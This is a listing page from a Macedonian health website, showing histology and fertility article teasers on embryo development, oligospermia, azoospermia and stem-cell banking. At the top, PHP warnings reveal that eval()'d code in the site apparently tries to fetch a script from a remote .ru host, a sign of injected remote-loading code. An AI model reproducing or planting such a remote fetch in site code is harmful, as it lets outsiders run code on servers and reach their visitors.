vw_histologija | За Здравје


Error message

 • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
 • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

ХИСТОЛОГИЈА

                           
                           
                           
                       
 • Како хуманиот ембрион ја добива својата форма

  Како може дисковиден собир на клетки да се трансформира во првиот месец од бременоста во издолжен ембрион? Овој механизам е мистерија која човекот се трудел да ја открие еден цел милениум. Првиот значаен чекор кон разбирањето на ова прашање е направен речиси пред еден век, во експериментите...

 • Што предизвикува мал број на сперматозоиди?

  Олигоспермијата, позната како мал број на сперматозоиди, е состојба во која бројот на сперматозоидите е под нормалата. Мажите со низок број на сперматозоиди имаат помали шанси за оплодување на јајце клетките. За среќа, постојат можности за лекување на оваа фрустрирачка состојба. Некои од...

 • И матичните клетки од забите на децата започнуваат да се чуваат во банките за матични клетки

  Д-р Molly Gunsaulis од САД е педијатриски стоматолог, пионер во својата работа за зачувување на матични клетки. Терапиите со матични клетки покажуваат големи ветувачки резултати при третманот на дијабетесот, срцевите заболувања, леукемијата, повредите на мозокот, склероза мултипла, Паркинсоновата...

 • Банка за матични клетки од крвта на папочната врвца

  Крвта од папочната врвца е онаа крв која останува во самата врвца и плацентата после раѓањето кога врвцата ќе се пресече. Банката за матични клетки кои потекнуваат од крвта на папочната врвца користи надворешни извори како место кое служи за складирање и конзервирање на крвта од папочната врвца на...

 • Азооспермија

  Бројот на сперматозоидите, нормално во милилитар е над 60 милиони. Аналогно, според бројот на сперматозоидите, се утврдуваат следниве термини: - 60-120 милиони во милилитар – нормоспермија - 20-60 милиони во милилитар – хипоспермија - помалку од 20 милиони во милилитар - олигоспермија...

ЗА ЗДРАВЈЕ NEWSLETTER